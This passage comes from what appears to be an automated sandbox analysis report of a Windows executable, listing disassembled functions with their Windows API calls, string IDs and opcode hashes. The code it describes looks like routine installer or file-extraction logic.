                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: FileInfoVersion$Size
                                                    • String ID: ProductName$\StringFileInfo\%04x%04x\%s$\VarFileInfo\Translation
                                                    • API String ID: 2104008232-2149928195
                                                    • Opcode ID: c90d7019636028a09b09bce33223ea9656682277339a396b516f084186f9a9d3
                                                    • Instruction ID: a4f79770029e637524a4e9991c1cd25ae962502ba4adcce1817402a428f7a941
                                                    • Opcode Fuzzy Hash: c90d7019636028a09b09bce33223ea9656682277339a396b516f084186f9a9d3
                                                    • Instruction Fuzzy Hash: 4A61DF719051099FCB14CFA8C849AEFBBB8FF05315F54819AE825A7391EB349D04CBA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004864F0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 145fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,D13B3340,?,00000010,?,00489EF0,?), ref: 00486556
                                                    • SetFilePointer.KERNEL32(00000000,?,00000010,00000000), ref: 0048659F
                                                    • ReadFile.KERNEL32(00000000,D13B3340,?,?,00000000,00000078,?), ref: 004865E1
                                                    • FindCloseChangeNotification.KERNEL32(00000000), ref: 0048665A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: File$ChangeCloseCreateFindNotificationPointerRead
                                                    • String ID: <3[
                                                    • API String ID: 2405668454-3672254634
                                                    • Opcode ID: f686f018058d1c55a67c35f9a1c0daf46152040b48d3447d69830ee530fac4e7
                                                    • Instruction ID: f3770de7da9039c619e63a0e748317dfdab2e6dd6b8eff65d5b26faa97b508ae
                                                    • Opcode Fuzzy Hash: f686f018058d1c55a67c35f9a1c0daf46152040b48d3447d69830ee530fac4e7
                                                    • Instruction Fuzzy Hash: 05517E70900649ABDB11DBA8CC48BEEFBB8FF05324F14865AE411BB2D1EB749905CB64
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00476F60 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 96fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00476B40: SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,D13B3340,00000000,00000000,?), ref: 00476B95
                                                      • Part of subcall function 00476B40: GetTempFileNameW.KERNEL32(00000000,shim_clone,00000000,?,?), ref: 00476C5C
                                                    • GetFileVersionInfoSizeW.KERNELBASE(?,000000FF,Shlwapi.dll,D13B3340,00000000,?,?,00000000,00589775,000000FF,Shlwapi.dll,00476F16,?,?,?), ref: 00476FAD
                                                    • GetFileVersionInfoW.KERNELBASE(?,?,?,00000000,00000000,?,?), ref: 00476FD9
                                                    • GetLastError.KERNEL32(?,?), ref: 0047701E
                                                    • DeleteFileW.KERNEL32(?), ref: 00477031
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: File$InfoVersion$DeleteErrorFolderLastNamePathSizeTemp
                                                    • String ID: Shlwapi.dll
                                                    • API String ID: 1346648681-1687636465
                                                    • Opcode ID: 93906f9f02e6d5758f1e106fe8c50b5dd5bebfbe3c3624d413469755b148282f
                                                    • Instruction ID: dd1d5d26ac35164ac1e66cb5daf6f66a73addd9442e8762d16fcdf5e92ed2446
                                                    • Opcode Fuzzy Hash: 93906f9f02e6d5758f1e106fe8c50b5dd5bebfbe3c3624d413469755b148282f
                                                    • Instruction Fuzzy Hash: 483192B1A05249AFDB10CFA5DD44FEFBBB8FF09350F14811AE905A3280DB399904CBA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0046FF30 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryW.KERNEL32(ComCtl32.dll,D13B3340,?,?,00000000), ref: 0046FF6E
                                                    • GetProcAddress.KERNEL32(00000000,LoadIconMetric), ref: 0046FF91
                                                    • FreeLibrary.KERNEL32(00000000), ref: 0047000F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Library$AddressFreeLoadProc
                                                    • String ID: ComCtl32.dll$LoadIconMetric
                                                    • API String ID: 145871493-764666640
                                                    • Opcode ID: c728b14eaf6841efa3d3206d9f1e9d578be470ad3e756b4783d12a2b13dee867
                                                    • Instruction ID: bb499d387d9d6e88b586777515f341671674f2bf32f87e305ccaf1c078b470b5
                                                    • Opcode Fuzzy Hash: c728b14eaf6841efa3d3206d9f1e9d578be470ad3e756b4783d12a2b13dee867
                                                    • Instruction Fuzzy Hash: F7316471A04259ABDB149F95DC44BAFBFF8FB49760F10412AF915A3280DB799A048B90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0046D7E0 Relevance: 7.6, APIs: 5, Instructions: 64windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • MsgWaitForMultipleObjectsEx.USER32(00000001,00000000,000000FF,000005FF,00000004), ref: 0046D801
                                                    • PeekMessageW.USER32(?,00000000), ref: 0046D847
                                                    • TranslateMessage.USER32(00000000), ref: 0046D852
                                                    • DispatchMessageW.USER32(00000000), ref: 0046D859
                                                    • MsgWaitForMultipleObjectsEx.USER32(00000001,?,000000FF,000005FF,00000004), ref: 0046D86B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Message$MultipleObjectsWait$DispatchPeekTranslate
                                                    • String ID:
                                                    • API String ID: 4084795276-0
                                                    • Opcode ID: ba03a6d154a88906d6282858c8e5f52c592d84c9ceb37196c16ddd9c6691f5b6
                                                    • Instruction ID: d7f6fc9f8308a0188f2486420e6236ef9089f0016c44164ed10f4a4cdce439b1
                                                    • Opcode Fuzzy Hash: ba03a6d154a88906d6282858c8e5f52c592d84c9ceb37196c16ddd9c6691f5b6
                                                    • Instruction Fuzzy Hash: CC115C71A443097AE720DB519C81FAB73DCEB89770F401226FA10E31C0EB34E9458765
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0048EEE0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 327COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • PathIsUNCW.SHLWAPI(?,D13B3340,?,00000010,?), ref: 0048F1AA
                                                      • Part of subcall function 0046E790: GetCurrentProcess.KERNEL32 ref: 0046E7D8
                                                      • Part of subcall function 0046E790: OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 0046E7E5
                                                      • Part of subcall function 0046E790: GetLastError.KERNEL32 ref: 0046E7EF
                                                      • Part of subcall function 0046E790: FindCloseChangeNotification.KERNEL32(00000000), ref: 0046E8D0
                                                      • Part of subcall function 0035AB90: GetProcessHeap.KERNEL32 ref: 0035ABE5
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035AC17
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035ACA2
                                                      • Part of subcall function 0035A140: FindResourceW.KERNEL32(00000000,?,00000006,?,?,000000A0,80070057,8007000E,80004005,00371A24,00000000,?,?,?,*.*), ref: 0035A163
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Process$FindInit_thread_footer$ChangeCloseCurrentErrorHeapLastNotificationOpenPathResourceToken
                                                    • String ID: Extraction path set to:$[WindowsVolume]$\\?\
                                                    • API String ID: 2914359614-3538578949
                                                    • Opcode ID: a55d9a6d1439bdb786a903a544ba829934f24b342bafada76256ebd9dcdb012d
                                                    • Instruction ID: fa45d59832e1787bf1f6cbb4d6213decb0a9f181c9a19bc8fce2b0b1f394ca08
                                                    • Opcode Fuzzy Hash: a55d9a6d1439bdb786a903a544ba829934f24b342bafada76256ebd9dcdb012d
                                                    • Instruction Fuzzy Hash: 02C1F330A005059FDB11EFA8C844BAEFBB4AF45314F1486A9E814AF3A2DB74DD04CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004BF2E0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 181fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNEL32(004C0324,40000000,00000001,00000000,00000002,00000080,00000000,D13B3340,?,00000001), ref: 004BF342
                                                    • WriteFile.KERNEL32(00000000,0000C800,0000C800,0000C800,00000000,?,0000C800), ref: 004BF3D8
                                                    • CloseHandle.KERNEL32(00000000,?,0000C800), ref: 004BF44C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: File$CloseCreateHandleWrite
                                                    • String ID: <3[
                                                    • API String ID: 1065093856-3672254634
                                                    • Opcode ID: f9fb2c6a73683efd6e5501f0510376561f9812bd56cb8e1324e65681ebc7cd4d
                                                    • Instruction ID: 7cdcbf91c8c3450f1707c9c1f2996acf4051a32c50a9ff3f76aeac0c844fc5d8
                                                    • Opcode Fuzzy Hash: f9fb2c6a73683efd6e5501f0510376561f9812bd56cb8e1324e65681ebc7cd4d
                                                    • Instruction Fuzzy Hash: AC517E71A10219AFDF10DFA8DD45BDEBBB9FF45310F14422AF814A7290DB75A904CBA8
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00474B10 Relevance: 6.3, APIs: 4, Instructions: 279COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadStringW.USER32(?,00000000,?,00000100), ref: 00474C0C
                                                    • LoadStringW.USER32(?,00000000,?,00000001), ref: 00474CA0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: LoadString
                                                    • String ID:
                                                    • API String ID: 2948472770-0
                                                    • Opcode ID: 6dab30f908a7e033ca7b28caf433f825ad390f551c9d8d1c3c230ddfdb3fd81e
                                                    • Instruction ID: b49f7172343a4f6dff83117f19d77416b80bcb038c791456adaacca80924ed39
                                                    • Opcode Fuzzy Hash: 6dab30f908a7e033ca7b28caf433f825ad390f551c9d8d1c3c230ddfdb3fd81e
                                                    • Instruction Fuzzy Hash: 17B19271D00209EFDB15DFA8D945BEEBBB5FF88310F10821AE815B7290DB746A44CB94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0046CB90 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 345COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0035AB90: GetProcessHeap.KERNEL32 ref: 0035ABE5
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035AC17
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035ACA2
                                                    • PathIsUNCW.SHLWAPI(?,?), ref: 0046CD26
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Init_thread_footer$HeapPathProcess
                                                    • String ID: \\?\$\\?\UNC\
                                                    • API String ID: 806983814-3019864461
                                                    • Opcode ID: 692b99bb0219243c95fa0c18c1e385aeb5731b309e116c67e35b8b3f7649a58a
                                                    • Instruction ID: 76c24252f976518fc4e929f99c28b62f6559d45a75c2d6b998fe5af8e66192d4
                                                    • Opcode Fuzzy Hash: 692b99bb0219243c95fa0c18c1e385aeb5731b309e116c67e35b8b3f7649a58a
                                                    • Instruction Fuzzy Hash: 55C1C2719005099FDB00DBA9CC85BAEFBF9FF49314F14826AE415EB2D1EB399904CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00494550 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,0048837F,?,?,?), ref: 0049457B
                                                    • CloseHandle.KERNEL32(?,D13B3340,?,00000000,?,?,?), ref: 0049465B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CloseDeleteFileHandle
                                                    • String ID: <3[
                                                    • API String ID: 2633145722-3672254634
                                                    • Opcode ID: 430a3bf09af0d021aa7b824e831ad7b1256388222697a612fcfbd7d236aba998
                                                    • Instruction ID: b53e8d5df10ed753aa24c7d31007a21951d54f5e52394d648033905760c56dbc
                                                    • Opcode Fuzzy Hash: 430a3bf09af0d021aa7b824e831ad7b1256388222697a612fcfbd7d236aba998
                                                    • Instruction Fuzzy Hash: 62510671A00615AFDB14DFA8C884B9AFBA4FF45714F14467AE914DB381DB38AD01CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004B2040 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 129COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • IsWindow.USER32(00000000), ref: 004B2091
                                                    • EndDialog.USER32(00000000,00000001), ref: 004B20A0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DialogWindow
                                                    • String ID: |^[
                                                    • API String ID: 2634769047-2049683584
                                                    • Opcode ID: fb68f995acdf0ce6cfd5910930a4f5dd4fa3e6a7325073d50214a38eea7b6ab2
                                                    • Instruction ID: b66c4c33feab126d42590fb6b2ae9c647250eb89e6434c585c9c69c20cc0e6b2
                                                    • Opcode Fuzzy Hash: fb68f995acdf0ce6cfd5910930a4f5dd4fa3e6a7325073d50214a38eea7b6ab2
                                                    • Instruction Fuzzy Hash: A0518B30901745DFD721CF68CA48B8AFBF5FF49310F14869AE4459B3A1D774AA04CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00539F58 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LCMapStringEx.KERNEL32(?,0053A2DA,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00539F8C
                                                    • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,0053A2DA,?,?,00000000,?,00000000), ref: 00539FAA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: String
                                                    • String ID: `{5
                                                    • API String ID: 2568140703-770602540
                                                    • Opcode ID: a6418106bdd8f3cbbc0a81bd21f140e620c4ac3a14ae4e816c801beffad24d38
                                                    • Instruction ID: 23a0e91c08e4be806e3fe59bd9cba0af43deabc905ca172c2c71dce6a856bc0b
                                                    • Opcode Fuzzy Hash: a6418106bdd8f3cbbc0a81bd21f140e620c4ac3a14ae4e816c801beffad24d38
                                                    • Instruction Fuzzy Hash: 8CF0683640411ABBCF125F90DC09AEE7F26FF88360F094110FA1865020CA76D871AB95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00524C57 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FlsAlloc.KERNEL32(?,00521BB6,00521AB9,00523D4F), ref: 00524C85
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Alloc
                                                    • String ID: FlsAlloc$`{5
                                                    • API String ID: 2773662609-995052927
                                                    • Opcode ID: 271b7b46a40f1ae581548677b33e67fc1c434a3191234b00d8d3d41733c5abdd
                                                    • Instruction ID: e209f87ec2739df346524d6744e7f735a8ccf7456c7b9810a7d9ea387726936b
                                                    • Opcode Fuzzy Hash: 271b7b46a40f1ae581548677b33e67fc1c434a3191234b00d8d3d41733c5abdd
                                                    • Instruction Fuzzy Hash: 6DD0123168563477CA1176946C06BBE7F5CFF42BA2F040165F94865192996248105AC5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0053A1EC Relevance: 4.7, APIs: 3, Instructions: 202COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __freea.LIBCMT ref: 0053A39B
                                                      • Part of subcall function 00538247: RtlAllocateHeap.NTDLL(00000000,00000000,00535FF3,?,0053A198,?,00000000,?,00529D85,00000000,00535FF3,?,?,?,?,00535DED), ref: 00538279
                                                    • __freea.LIBCMT ref: 0053A3B0
                                                    • __freea.LIBCMT ref: 0053A3C0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: __freea$AllocateHeap
                                                    • String ID:
                                                    • API String ID: 2243444508-0
                                                    • Opcode ID: 8cad3b048d11ab998cdb93ef3c10b939a70d75a004d5f55028c9d85a93e0de85
                                                    • Instruction ID: 0c334c00ca4fd436727d52d21d9560676e64c510833349f120932eb07a9d8979
                                                    • Opcode Fuzzy Hash: 8cad3b048d11ab998cdb93ef3c10b939a70d75a004d5f55028c9d85a93e0de85
                                                    • Instruction Fuzzy Hash: 7551BEB260021AAFEB259EA5DC85EBF3FA9FF84750F150928FD48D6151EB31CC508762
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00491F00 Relevance: 4.7, APIs: 3, Instructions: 192fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetFilePointer.KERNEL32(?,?,?,00000000,D13B3340,?,?), ref: 00491F67
                                                    • ReadFile.KERNEL32(?,00000000,00000018,?,00000000), ref: 00492074
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
